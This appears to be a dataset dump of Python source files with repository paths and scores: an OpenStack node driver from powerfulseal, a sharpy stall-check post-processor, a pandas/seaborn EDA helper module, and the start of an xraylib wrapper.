"ACTIVE": NodeState.UP,
"STOPPED": NodeState.DOWN,
"SHUTOFF": NodeState.DOWN,
}
def server_status_to_state(status):
return MAPPING_STATES_STATUS.get(status.upper(), NodeState.UNKNOWN)
def create_node_from_server(server):
""" Translate OpenStack server representation into a Node object.
"""
return Node(
id=server.id,
ip=get_all_ips(server)[-1],
az=server.availability_zone,
name=server.name,
state=server_status_to_state(server.status),
)
class OpenStackDriver(AbstractDriver):
"""
Concrete implementation of the OpenStack cloud driver.
"""
def __init__(self, cloud=None, conn=None, logger=None):
self.logger = logger or logging.getLogger(__name__)
self.conn = conn or create_connection_from_config(cloud)
self.remote_servers = []
def sync(self):
""" Downloads a fresh set of nodes form the API.
"""
self.logger.debug("Synchronizing remote nodes")
self.remote_servers = list(self.conn.compute.servers())
self.logger.info("Fetched %s remote servers" % len(self.remote_servers))
def get_by_ip(self, ip):
""" Retreive an instance of Node by its IP.
"""
for server in self.remote_servers:
addresses = get_all_ips(server)
if not addresses:
self.logger.warning("No addresses found: %s", server)
else:
for addr in addresses:
if addr == ip:
return create_node_from_server(server)
return None
def stop(self, node):
""" Stop a Node.
"""
self.conn.compute.stop_server(node.id)
def start(self, node):
""" Start a Node.
"""
self.conn.compute.start_server(node.id)
def delete(self, node):
""" Delete a Node permanently.
"""
self.conn.compute.delete_server(node.id)
|
powerfulseal/clouddrivers/open_stack_driver.py
| 0.620162 | 0.112356 |
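A minimal sketch of the server shape these helpers read, using a stand-in object instead of a live OpenStack connection; it assumes the module is importable as powerfulseal.clouddrivers.open_stack_driver, and the field values are invented.

from types import SimpleNamespace

from powerfulseal.clouddrivers.open_stack_driver import create_node_from_server, get_all_ips

# Only the attributes the helpers actually read are provided.
server = SimpleNamespace(
    id='srv-1',
    name='worker-0',
    availability_zone='nova',
    status='ACTIVE',
    addresses={'private': [{'addr': '10.0.0.5', 'version': 4}]},
)
print(get_all_ips(server))              # ['10.0.0.5']
print(create_node_from_server(server))  # Node with state UP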
import os
import numpy as np
from tvtk.api import tvtk, write_data
import sharpy.utils.algebra as algebra
import sharpy.utils.cout_utils as cout
from sharpy.utils.settings import str2bool
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings
from sharpy.utils.datastructures import init_matrix_structure, standalone_ctypes_pointer
import sharpy.aero.utils.uvlmlib as uvlmlib
@solver
class StallCheck(BaseSolver):
"""
Outputs the incidence angle of every panel of the surface.
"""
solver_id = 'StallCheck'
solver_classification = 'post-processor'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen '
settings_types['airfoil_stall_angles'] = 'dict'
settings_default['airfoil_stall_angles'] = dict()
settings_description['airfoil_stall_angles'] = 'Dictionary of stall angles for each airfoil'
settings_types['output_degrees'] = 'bool'
settings_default['output_degrees'] = False
settings_description['output_degrees'] = 'Output incidence angles in degrees vs radians'
settings_table = settings.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.settings = None
self.data = None
self.ts_max = None
self.ts = None
def initialise(self, data, custom_settings=None):
self.data = data
if custom_settings is None:
self.settings = data.settings[self.solver_id]
else:
self.settings = custom_settings
settings.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.ts_max = len(self.data.structure.timestep_info)
def run(self, online=False):
if not online:
for self.ts in range(self.ts_max):
self.check_stall()
cout.cout_wrap('...Finished', 1)
else:
self.ts = len(self.data.structure.timestep_info) - 1
self.check_stall()
return self.data
def check_stall(self):
# add entry to dictionary for postproc
tstep = self.data.aero.timestep_info[self.ts]
tstep.postproc_cell['incidence_angle'] = init_matrix_structure(dimensions=tstep.dimensions,
with_dim_dimension=False)
# create ctypes pointers
tstep.postproc_cell['incidence_angle_ct_list'] = None
tstep.postproc_cell['incidence_angle_ct_pointer'] = None
tstep.postproc_cell['incidence_angle_ct_list'], tstep.postproc_cell['incidence_angle_ct_pointer'] = \
standalone_ctypes_pointer(tstep.postproc_cell['incidence_angle'])
# call calculate
uvlmlib.uvlm_calculate_incidence_angle(self.data.aero.timestep_info[self.ts],
self.data.structure.timestep_info[self.ts])
# calculate ratio of stalled panels and print
stalled_panels = False
stalled_surfs = np.zeros((tstep.n_surf, ), dtype=int)
added_panels = []
for i_surf in range(tstep.n_surf):
added_panels.append([])
for i_elem in range(self.data.structure.num_elem):
for i_local_node in range(self.data.structure.num_node_elem):
airfoil_id = self.data.aero.aero_dict['airfoil_distribution'][i_elem, i_local_node]
if self.settings['airfoil_stall_angles']:
i_global_node = self.data.structure.connectivities[i_elem, i_local_node]
for i_dict in self.data.aero.struct2aero_mapping[i_global_node]:
i_surf = i_dict['i_surf']
i_n = i_dict['i_n']
if i_n in added_panels[i_surf]:
continue
if i_n == tstep.dimensions[i_surf][1]:
continue
limits = self.settings['airfoil_stall_angles'][str(airfoil_id)]
if tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] < float(limits[0]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
elif tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] > float(limits[1]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
if stalled_panels:
if self.settings['print_info']:
                cout.cout_wrap('At least one panel has an incidence angle outside the linear region', 1)
                cout.cout_wrap('The number of stalled panels per surface id is:', 1)
for i_surf in range(tstep.n_surf):
cout.cout_wrap('\ti_surf = ' + str(i_surf) + ': ' + str(stalled_surfs[i_surf]) + ' panels.', 1)
# cout.cout_wrap('In total, the ratio of stalled panels is: ', str(stalled_surfs.sum()/))
if self.settings['output_degrees']:
for i_surf in range(tstep.n_surf):
tstep.postproc_cell['incidence_angle'][i_surf] *= 180/np.pi
|
sharpy/postproc/stallcheck.py
|
import os
import numpy as np
from tvtk.api import tvtk, write_data
import sharpy.utils.algebra as algebra
import sharpy.utils.cout_utils as cout
from sharpy.utils.settings import str2bool
from sharpy.utils.solver_interface import solver, BaseSolver
import sharpy.utils.settings as settings
from sharpy.utils.datastructures import init_matrix_structure, standalone_ctypes_pointer
import sharpy.aero.utils.uvlmlib as uvlmlib
@solver
class StallCheck(BaseSolver):
"""
Outputs the incidence angle of every panel of the surface.
"""
solver_id = 'StallCheck'
solver_classification = 'post-processor'
settings_types = dict()
settings_default = dict()
settings_description = dict()
settings_types['print_info'] = 'bool'
settings_default['print_info'] = True
settings_description['print_info'] = 'Print info to screen '
settings_types['airfoil_stall_angles'] = 'dict'
settings_default['airfoil_stall_angles'] = dict()
settings_description['airfoil_stall_angles'] = 'Dictionary of stall angles for each airfoil'
settings_types['output_degrees'] = 'bool'
settings_default['output_degrees'] = False
    settings_description['output_degrees'] = 'Output incidence angles in degrees instead of radians'
settings_table = settings.SettingsTable()
__doc__ += settings_table.generate(settings_types, settings_default, settings_description)
def __init__(self):
self.settings = None
self.data = None
self.ts_max = None
self.ts = None
def initialise(self, data, custom_settings=None):
self.data = data
if custom_settings is None:
self.settings = data.settings[self.solver_id]
else:
self.settings = custom_settings
settings.to_custom_types(self.settings, self.settings_types, self.settings_default)
self.ts_max = len(self.data.structure.timestep_info)
def run(self, online=False):
if not online:
for self.ts in range(self.ts_max):
self.check_stall()
cout.cout_wrap('...Finished', 1)
else:
self.ts = len(self.data.structure.timestep_info) - 1
self.check_stall()
return self.data
def check_stall(self):
# add entry to dictionary for postproc
tstep = self.data.aero.timestep_info[self.ts]
tstep.postproc_cell['incidence_angle'] = init_matrix_structure(dimensions=tstep.dimensions,
with_dim_dimension=False)
# create ctypes pointers
tstep.postproc_cell['incidence_angle_ct_list'] = None
tstep.postproc_cell['incidence_angle_ct_pointer'] = None
tstep.postproc_cell['incidence_angle_ct_list'], tstep.postproc_cell['incidence_angle_ct_pointer'] = \
standalone_ctypes_pointer(tstep.postproc_cell['incidence_angle'])
# call calculate
uvlmlib.uvlm_calculate_incidence_angle(self.data.aero.timestep_info[self.ts],
self.data.structure.timestep_info[self.ts])
# calculate ratio of stalled panels and print
stalled_panels = False
stalled_surfs = np.zeros((tstep.n_surf, ), dtype=int)
added_panels = []
for i_surf in range(tstep.n_surf):
added_panels.append([])
for i_elem in range(self.data.structure.num_elem):
for i_local_node in range(self.data.structure.num_node_elem):
airfoil_id = self.data.aero.aero_dict['airfoil_distribution'][i_elem, i_local_node]
if self.settings['airfoil_stall_angles']:
i_global_node = self.data.structure.connectivities[i_elem, i_local_node]
for i_dict in self.data.aero.struct2aero_mapping[i_global_node]:
i_surf = i_dict['i_surf']
i_n = i_dict['i_n']
if i_n in added_panels[i_surf]:
continue
if i_n == tstep.dimensions[i_surf][1]:
continue
limits = self.settings['airfoil_stall_angles'][str(airfoil_id)]
if tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] < float(limits[0]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
elif tstep.postproc_cell['incidence_angle'][i_surf][0, i_n] > float(limits[1]):
stalled_panels = True
stalled_surfs[i_surf] += tstep.postproc_cell['incidence_angle'][i_surf].shape[1]
if stalled_panels:
if self.settings['print_info']:
                cout.cout_wrap('At least one panel has an incidence angle outside the linear region', 1)
                cout.cout_wrap('The number of stalled panels per surface id is:', 1)
for i_surf in range(tstep.n_surf):
cout.cout_wrap('\ti_surf = ' + str(i_surf) + ': ' + str(stalled_surfs[i_surf]) + ' panels.', 1)
# cout.cout_wrap('In total, the ratio of stalled panels is: ', str(stalled_surfs.sum()/))
if self.settings['output_degrees']:
for i_surf in range(tstep.n_surf):
tstep.postproc_cell['incidence_angle'][i_surf] *= 180/np.pi
| 0.556882 | 0.256861 |
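A minimal, self-contained sketch of how the 'airfoil_stall_angles' limits in the StallCheck record above are interpreted: an incidence angle outside the [lower, upper] interval marks a panel as stalled. The numbers below are made up for illustration.

import numpy as np

stall_limits = {"0": (-0.2, 0.3)}          # per-airfoil (lower, upper) limits in radians (illustrative)
incidence = np.array([0.05, 0.35, -0.25])  # toy incidence angles for three panels

lower, upper = (float(v) for v in stall_limits["0"])
stalled = (incidence < lower) | (incidence > upper)
print(f"{stalled.sum()} of {incidence.size} panels are outside the linear region")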
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
from sklearn.dummy import DummyRegressor
"""
NAME
eda_tools
DESCRIPTION
This module provides functions to automate common procedures in EDA, model
preparation, and data visualization process.
MODULE CONTENTS
inspect_dupes
inspect_nans
view_columns_w_many_nans
drop_columns_w_many_nans
histograms_numeric_columns
boxplots_categorical_columns
scatter_plots
heatmap_numeric_w_dependent_variable
high_corr_w_dependent_variable
high_corr_among_independent_variable
categorical_to_ordinal_transformer
transform_categorical_to_numercial
dummify_categorical_columns
conform_columns
viz_resids
print_error_metrics
"""
def inspect_dupes(df, dedupe=False):
'''
    Checks for duplicate rows and removes them if the dedupe arg is set to True
Arg: dataframe, dedupe (bool)
'''
num_of_dupe = len(df[df.duplicated()])
if dedupe and num_of_dupe>0:
df.drop_duplicates(inplace=True)
print(f'Number of duplicates found: {num_of_dupe}')
return df
else:
print(f'Number of duplicates found: {num_of_dupe}')
return num_of_dupe
def inspect_nans(df):
'''
Check number and percentage of NaN
Arg: dataframe
'''
num_of_nan = df.isnull().sum().sum()
if num_of_nan > 0:
mask_total = df.isnull().sum().sort_values(ascending=False)
number = mask_total[mask_total > 0]
mask_percent = df.isnull().mean().sort_values(ascending=False)
percent = mask_percent[mask_percent > 0]
missing_data = pd.concat([number, percent], axis=1, keys=['Number_of_NaN', 'Percent_of_NaN'])
print(f'Number and Percentage of NaN:\n {missing_data}')
else:
print('No NaN found.')
return num_of_nan
def view_columns_w_many_nans(df, missing_percent=.9):
'''
    Checks which columns have more than the specified percentage of missing
    values
Args: dataframe, missing percentage (default=.9)
Returns columns (list)
'''
mask_percent = df.isnull().mean()
series = mask_percent[mask_percent > missing_percent]
columns = series.index.to_list()
print(columns)
return columns
def drop_columns_w_many_nans(df, missing_percent=.9):
'''
    Drops the columns whose percentage of missing values is greater than the specified missing percentage
Args: dataframe, missing percentage (default=.9)
Returns dataframe
'''
list_of_cols = view_columns_w_many_nans(df, missing_percent=missing_percent)
df.drop(columns=list_of_cols, inplace=True)
print(list_of_cols, 'Caution: df has been mutated!')
return df
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
# Reference: https://seaborn.pydata.org/tutorial/axis_grids.html
def histograms_numeric_columns(df, numerical_columns):
'''
Args: dataframe, numerical columns (list)
    Returns grouped histograms
'''
f = pd.melt(df, value_vars=numerical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=4, sharex=False, sharey=False)
g = g.map(sns.distplot, 'value')
return g
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
def boxplots_categorical_columns(df, categorical_columns, dependant_variable):
'''
    Args: dataframe, categorical columns (list), dependent variable (str)
    Returns grouped boxplots of the relationship between categorical variables and the dependent variable
'''
def boxplot(x, y, **kwargs):
sns.boxplot(x=x, y=y)
x=plt.xticks(rotation=90)
f = pd.melt(df, id_vars=[dependant_variable], value_vars=categorical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=2, sharex=False, sharey=False, height=10)
g = g.map(boxplot, 'value', dependant_variable)
return g
def scatter_plots(df, numerical_cols, target_col):
'''
Args: dataframe, numerical columns (list), target column (str)
'''
# Calculate the number of rows
num_rows = (len(numerical_cols) // 3) + 1
# Generate a 3 x n subplots frame
    fig, ax = plt.subplots(num_rows, 3, sharey='row', figsize=(15,20))
# Reference: https://stackoverflow.com/a/434328
# Define a function to iterate through a list and divide them into chunks
def chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
# Iterate through numerical_cols and generate each subplot
for y, plot_group in enumerate(chunker((numerical_cols), 3)):
for x, col in enumerate(plot_group):
sub_ax = ax[y][x]
sub_ax.scatter(df[col], df[target_col], s=2)
sub_ax.set_title(col)
def heatmap_numeric_w_dependent_variable(df, dependent_variable):
'''
    Args: dataframe, dependent variable (str)
Returns heatmap of independent variables' correlations with dependent variable
'''
plt.figure(figsize=(8, 10))
g = sns.heatmap(df.corr()[[dependent_variable]].sort_values(by=dependent_variable),
annot=True,
cmap='coolwarm',
vmin=-1,
vmax=1)
return g
def high_corr_w_dependent_variable(df, dependent_variable, corr_value):
'''
Args: dataframe, dependent variable (str), and value of correlation (float)
    Returns dataframe of independent variables that are highly correlated (e.g. abs(corr) > 0.4) with the dependent variable
'''
temp_df = df.corr()[[dependent_variable]].sort_values(by=dependent_variable, ascending=False)
mask_1 = abs(temp_df[dependent_variable]) > corr_value
return temp_df.loc[mask_1]
def high_corr_among_independent_variable(df, dependent_variable, corr_value):
'''
    Checks correlations among independent variables and identifies which pairs of features are strongly correlated
    Args: dataframe, dependent variable, and value of correlation
Returns dictionary
'''
df_corr = df.drop(columns=[dependent_variable]).corr()
corr_dict = df_corr.to_dict()
temp_dict = {key_1: {key_2 : value
                         for key_2, value in embedded_dictionary.items()
                         if abs(value) < 1 and abs(value) > corr_value}
                 for key_1, embedded_dictionary in corr_dict.items()}
return {k:v for k, v in temp_dict.items() if v}
def categorical_to_ordinal_transformer(categories):
'''
Returns a function that will map categories to ordinal values based on the
order of the list of `categories` given.
Example:
If categories is ['A', 'B', 'C'] then the transformer will map
'A' -> 0, 'B' -> 1, 'C' -> 2.
'''
return lambda categorical_value: categories.index(categorical_value)
def transform_categorical_to_numercial(df, categorical_numerical_mapping):
'''
Transforms categorical columns to numerical columns
Args: dataframe, dictionary
Returns dataframe
'''
transformers = {k: categorical_to_ordinal_transformer(v)
for k, v in categorical_numerical_mapping.items()}
new_df = df.copy()
for col, transformer in transformers.items():
new_df[col] = new_df[col].map(transformer).astype('int64')
return new_df
def dummify_categorical_columns(df):
'''
Dummifies all categorical columns
Args: dataframe
Returns dataframe
'''
categorical_columns = df.select_dtypes(include="object").columns
return pd.get_dummies(df, columns=categorical_columns, drop_first=True)
def conform_columns(df_reference, df):
'''
Drops columns in dataframe that are not in the reference dataframe
Args: dataframe as reference, dataframe
Returns dataframe
'''
to_drop = [c for c in df.columns if c not in df_reference.columns]
return df.drop(to_drop, axis=1)
def viz_resids(model_title, X, y, random_state_number=42):
'''
Thanks to <NAME> for creating this visualization function!
Args: model title (str), X(features), y(target)
Returns 3 error plots
'''
# For help with multiple figures: https://matplotlib.org/3.1.1/gallery/subplots_axes_and_figures/subplots_demo.html
# HANDLING DATA
# train/test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=random_state_number)
    # instantiate model
lr = LinearRegression()
# fit model
lr.fit(X_train, y_train)
preds = lr.predict(X_test)
resids = y_test - preds
target_name = y.name.capitalize()
# HANDLING SUBPLOTS
fig, axes = plt.subplots(2, 2, figsize=(12,10)) # 2 row x 2 columns
fig.suptitle(f"{model_title}: $R^2$ test ={lr.score(X_test, y_test):2.2%}", fontsize = 24, y = 1.05)
ax_1 = axes[0][0]
ax_2 = axes[0][1]
ax_3 = axes[1][0]
subplot_title_size = 18
subplot_label_size = 14
# 1ST PLOT - y_true vs. y_pred
ax_1.set_title("True Values ($y$) vs. Predictions ($\hat{y}$)", fontsize = subplot_title_size, pad = 10)
    maxDist = max(max(preds),max(y)) # maximum value used to determine x_lim and y_lim
    minDist = min(min(preds),min(y)) # minimum value used to determine x_lim and y_lim
# 45deg line, signifying prediction == true value
ax_1.plot((minDist,maxDist),(minDist,maxDist), c = "r", alpha = .7);
sns.scatterplot(ax = ax_1, x = y_test, y = preds, alpha = .5)
ax_1.set_xlabel("True Values ($y$)", fontsize = subplot_label_size, labelpad = 10)
ax_1.set_ylabel("Predictions ($\hat{y}$)", fontsize = subplot_label_size, labelpad = 10)
# 2ND PLOT - residuals
ax_2.set_title("Residuals", fontsize = subplot_title_size)
sns.scatterplot(ax = ax_2, x = range(len(resids)),y = resids, alpha = .5)
ax_2.set_ylabel(target_name, fontsize = subplot_label_size)
ax_2.axhline(0, c = "r", alpha = .7);
# 3RD PLOT - residuals histogram
ax_3.set_title("Histogram of residuals", fontsize = subplot_title_size)
sns.distplot(resids, ax = ax_3, kde = False);
ax_3.set_xlabel(target_name, fontsize = subplot_label_size)
ax_3.set_ylabel("Frequency", fontsize = subplot_label_size)
    plt.tight_layout() # handles most overlapping and spacing issues
def print_error_metrics(y_true, y_preds, n, k):
'''
Args: y_true, y_preds,
n: the number of observations.
k: the number of independent variables, excluding the constant.
Returns 6 error metrics
'''
def r2_adj(y_true, y_preds, n, k):
rss = np.sum((y_true - y_preds)**2)
null_model = np.sum((y_true - np.mean(y_true))**2)
r2 = 1 - rss/null_model
r2_adj = 1 - ((1-r2)*(n-1))/(n-k-1)
return r2_adj
print('Mean Square Error: ', mean_squared_error(y_true, y_preds))
print('Root Mean Square Error: ', np.sqrt(mean_squared_error(y_true, y_preds)))
print('Mean absolute error: ', mean_absolute_error(y_true, y_preds))
print('Median absolute error: ', median_absolute_error(y_true, y_preds))
print('R^2 score:', r2_score(y_true, y_preds))
print('Adjusted R^2 score:', r2_adj(y_true, y_preds, n, k))
|
eda_and_beyond/eda_tools.py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV
from sklearn.model_selection import cross_val_score, train_test_split
from sklearn.preprocessing import StandardScaler, PolynomialFeatures
from sklearn.metrics import mean_squared_error, mean_absolute_error, median_absolute_error, r2_score
from sklearn.dummy import DummyRegressor
"""
NAME
eda_tools
DESCRIPTION
This module provides functions to automate common procedures in EDA, model
preparation, and data visualization process.
MODULE CONTENTS
inspect_dupes
inspect_nans
view_columns_w_many_nans
drop_columns_w_many_nans
histograms_numeric_columns
boxplots_categorical_columns
scatter_plots
heatmap_numeric_w_dependent_variable
high_corr_w_dependent_variable
high_corr_among_independent_variable
categorical_to_ordinal_transformer
transform_categorical_to_numercial
dummify_categorical_columns
conform_columns
viz_resids
print_error_metrics
"""
def inspect_dupes(df, dedupe=False):
'''
    Checks for duplicate rows and removes them if the dedupe arg is set to True
Arg: dataframe, dedupe (bool)
'''
num_of_dupe = len(df[df.duplicated()])
if dedupe and num_of_dupe>0:
df.drop_duplicates(inplace=True)
print(f'Number of duplicates found: {num_of_dupe}')
return df
else:
print(f'Number of duplicates found: {num_of_dupe}')
return num_of_dupe
def inspect_nans(df):
'''
Check number and percentage of NaN
Arg: dataframe
'''
num_of_nan = df.isnull().sum().sum()
if num_of_nan > 0:
mask_total = df.isnull().sum().sort_values(ascending=False)
number = mask_total[mask_total > 0]
mask_percent = df.isnull().mean().sort_values(ascending=False)
percent = mask_percent[mask_percent > 0]
missing_data = pd.concat([number, percent], axis=1, keys=['Number_of_NaN', 'Percent_of_NaN'])
print(f'Number and Percentage of NaN:\n {missing_data}')
else:
print('No NaN found.')
return num_of_nan
def view_columns_w_many_nans(df, missing_percent=.9):
'''
    Checks which columns have more than the specified percentage of missing
    values
Args: dataframe, missing percentage (default=.9)
Returns columns (list)
'''
mask_percent = df.isnull().mean()
series = mask_percent[mask_percent > missing_percent]
columns = series.index.to_list()
print(columns)
return columns
def drop_columns_w_many_nans(df, missing_percent=.9):
'''
    Drops the columns whose percentage of missing values is greater than the specified missing percentage
Args: dataframe, missing percentage (default=.9)
Returns dataframe
'''
list_of_cols = view_columns_w_many_nans(df, missing_percent=missing_percent)
df.drop(columns=list_of_cols, inplace=True)
print(list_of_cols, 'Caution: df has been mutated!')
return df
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
# Reference: https://seaborn.pydata.org/tutorial/axis_grids.html
def histograms_numeric_columns(df, numerical_columns):
'''
Args: dataframe, numerical columns (list)
    Returns grouped histograms
'''
f = pd.melt(df, value_vars=numerical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=4, sharex=False, sharey=False)
g = g.map(sns.distplot, 'value')
return g
# Adapted from https://www.kaggle.com/dgawlik/house-prices-eda#Categorical-data
def boxplots_categorical_columns(df, categorical_columns, dependant_variable):
'''
    Args: dataframe, categorical columns (list), dependent variable (str)
    Returns grouped boxplots of the relationship between categorical variables and the dependent variable
'''
def boxplot(x, y, **kwargs):
sns.boxplot(x=x, y=y)
x=plt.xticks(rotation=90)
f = pd.melt(df, id_vars=[dependant_variable], value_vars=categorical_columns)
g = sns.FacetGrid(f, col='variable', col_wrap=2, sharex=False, sharey=False, height=10)
g = g.map(boxplot, 'value', dependant_variable)
return g
def scatter_plots(df, numerical_cols, target_col):
'''
Args: dataframe, numerical columns (list), target column (str)
'''
# Calculate the number of rows
num_rows = (len(numerical_cols) // 3) + 1
# Generate a 3 x n subplots frame
    fig, ax = plt.subplots(num_rows, 3, sharey='row', figsize=(15,20))
# Reference: https://stackoverflow.com/a/434328
# Define a function to iterate through a list and divide them into chunks
def chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
# Iterate through numerical_cols and generate each subplot
for y, plot_group in enumerate(chunker((numerical_cols), 3)):
for x, col in enumerate(plot_group):
sub_ax = ax[y][x]
sub_ax.scatter(df[col], df[target_col], s=2)
sub_ax.set_title(col)
def heatmap_numeric_w_dependent_variable(df, dependent_variable):
'''
    Args: dataframe, dependent variable (str)
Returns heatmap of independent variables' correlations with dependent variable
'''
plt.figure(figsize=(8, 10))
g = sns.heatmap(df.corr()[[dependent_variable]].sort_values(by=dependent_variable),
annot=True,
cmap='coolwarm',
vmin=-1,
vmax=1)
return g
def high_corr_w_dependent_variable(df, dependent_variable, corr_value):
'''
Args: dataframe, dependent variable (str), and value of correlation (float)
    Returns dataframe of independent variables that are highly correlated (e.g. abs(corr) > 0.4) with the dependent variable
'''
temp_df = df.corr()[[dependent_variable]].sort_values(by=dependent_variable, ascending=False)
mask_1 = abs(temp_df[dependent_variable]) > corr_value
return temp_df.loc[mask_1]
def high_corr_among_independent_variable(df, dependent_variable, corr_value):
'''
    Checks correlations among independent variables and identifies which pairs of features are strongly correlated
    Args: dataframe, dependent variable, and value of correlation
Returns dictionary
'''
df_corr = df.drop(columns=[dependent_variable]).corr()
corr_dict = df_corr.to_dict()
temp_dict = {key_1: {key_2 : value
                         for key_2, value in embedded_dictionary.items()
                         if abs(value) < 1 and abs(value) > corr_value}
                 for key_1, embedded_dictionary in corr_dict.items()}
return {k:v for k, v in temp_dict.items() if v}
def categorical_to_ordinal_transformer(categories):
'''
Returns a function that will map categories to ordinal values based on the
order of the list of `categories` given.
Example:
If categories is ['A', 'B', 'C'] then the transformer will map
'A' -> 0, 'B' -> 1, 'C' -> 2.
'''
return lambda categorical_value: categories.index(categorical_value)
def transform_categorical_to_numercial(df, categorical_numerical_mapping):
'''
Transforms categorical columns to numerical columns
Args: dataframe, dictionary
Returns dataframe
'''
transformers = {k: categorical_to_ordinal_transformer(v)
for k, v in categorical_numerical_mapping.items()}
new_df = df.copy()
for col, transformer in transformers.items():
new_df[col] = new_df[col].map(transformer).astype('int64')
return new_df
def dummify_categorical_columns(df):
'''
Dummifies all categorical columns
Args: dataframe
Returns dataframe
'''
categorical_columns = df.select_dtypes(include="object").columns
return pd.get_dummies(df, columns=categorical_columns, drop_first=True)
def conform_columns(df_reference, df):
'''
Drops columns in dataframe that are not in the reference dataframe
Args: dataframe as reference, dataframe
Returns dataframe
'''
to_drop = [c for c in df.columns if c not in df_reference.columns]
return df.drop(to_drop, axis=1)
def viz_resids(model_title, X, y, random_state_number=42):
'''
Thanks to <NAME> for creating this visualization function!
Args: model title (str), X(features), y(target)
Returns 3 error plots
'''
# For help with multiple figures: https://matplotlib.org/3.1.1/gallery/subplots_axes_and_figures/subplots_demo.html
# HANDLING DATA
# train/test split
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=random_state_number)
    # instantiate model
lr = LinearRegression()
# fit model
lr.fit(X_train, y_train)
preds = lr.predict(X_test)
resids = y_test - preds
target_name = y.name.capitalize()
# HANDLING SUBPLOTS
fig, axes = plt.subplots(2, 2, figsize=(12,10)) # 2 row x 2 columns
fig.suptitle(f"{model_title}: $R^2$ test ={lr.score(X_test, y_test):2.2%}", fontsize = 24, y = 1.05)
ax_1 = axes[0][0]
ax_2 = axes[0][1]
ax_3 = axes[1][0]
subplot_title_size = 18
subplot_label_size = 14
# 1ST PLOT - y_true vs. y_pred
ax_1.set_title("True Values ($y$) vs. Predictions ($\hat{y}$)", fontsize = subplot_title_size, pad = 10)
    maxDist = max(max(preds),max(y)) # maximum value used to determine x_lim and y_lim
    minDist = min(min(preds),min(y)) # minimum value used to determine x_lim and y_lim
# 45deg line, signifying prediction == true value
ax_1.plot((minDist,maxDist),(minDist,maxDist), c = "r", alpha = .7);
sns.scatterplot(ax = ax_1, x = y_test, y = preds, alpha = .5)
ax_1.set_xlabel("True Values ($y$)", fontsize = subplot_label_size, labelpad = 10)
ax_1.set_ylabel("Predictions ($\hat{y}$)", fontsize = subplot_label_size, labelpad = 10)
# 2ND PLOT - residuals
ax_2.set_title("Residuals", fontsize = subplot_title_size)
sns.scatterplot(ax = ax_2, x = range(len(resids)),y = resids, alpha = .5)
ax_2.set_ylabel(target_name, fontsize = subplot_label_size)
ax_2.axhline(0, c = "r", alpha = .7);
# 3RD PLOT - residuals histogram
ax_3.set_title("Histogram of residuals", fontsize = subplot_title_size)
sns.distplot(resids, ax = ax_3, kde = False);
ax_3.set_xlabel(target_name, fontsize = subplot_label_size)
ax_3.set_ylabel("Frequency", fontsize = subplot_label_size)
    plt.tight_layout() # handles most overlapping and spacing issues
def print_error_metrics(y_true, y_preds, n, k):
'''
Args: y_true, y_preds,
n: the number of observations.
k: the number of independent variables, excluding the constant.
Returns 6 error metrics
'''
def r2_adj(y_true, y_preds, n, k):
rss = np.sum((y_true - y_preds)**2)
null_model = np.sum((y_true - np.mean(y_true))**2)
r2 = 1 - rss/null_model
r2_adj = 1 - ((1-r2)*(n-1))/(n-k-1)
return r2_adj
print('Mean Square Error: ', mean_squared_error(y_true, y_preds))
print('Root Mean Square Error: ', np.sqrt(mean_squared_error(y_true, y_preds)))
print('Mean absolute error: ', mean_absolute_error(y_true, y_preds))
print('Median absolute error: ', median_absolute_error(y_true, y_preds))
print('R^2 score:', r2_score(y_true, y_preds))
print('Adjusted R^2 score:', r2_adj(y_true, y_preds, n, k))
| 0.594669 | 0.611875 |
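A self-contained usage sketch of the NaN-threshold pattern behind view_columns_w_many_nans and drop_columns_w_many_nans above, using toy data and a 0.5 threshold instead of the 0.9 default.

import numpy as np
import pandas as pd

df = pd.DataFrame({"a": [1, np.nan, np.nan, np.nan],
                   "b": [1, 2, 3, 4],
                   "c": [np.nan, np.nan, 3, 4]})
mask_percent = df.isnull().mean()                                # fraction of NaN per column
cols_to_drop = mask_percent[mask_percent > 0.5].index.to_list()
print(cols_to_drop)                                              # ['a'] -- only 'a' exceeds 50% missing
df_clean = df.drop(columns=cols_to_drop)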
import re
import xraylib
from skbeam.core.constants import XrfElement as Element
from skbeam.core.fitting.xrf_model import K_LINE, L_LINE, M_LINE
def get_element_atomic_number(element_str):
r"""
A wrapper to ``SymbolToAtomicNumber`` function from ``xraylib``.
    Returns atomic number for the symbolic element name (e.g. ``C`` or ``Fe``).
    Parameters
    ----------
    element_str: str
        symbolic representation of an element
Returns
-------
Atomic number of the element ``element_str``. If element is invalid, then
the function returns 0.
"""
xraylib.SetErrorMessages(0) # Turn off error messages from ``xraylib``
try:
val = xraylib.SymbolToAtomicNumber(element_str)
except ValueError:
# Imitate the behavior of xraylib 3
val = 0
return val
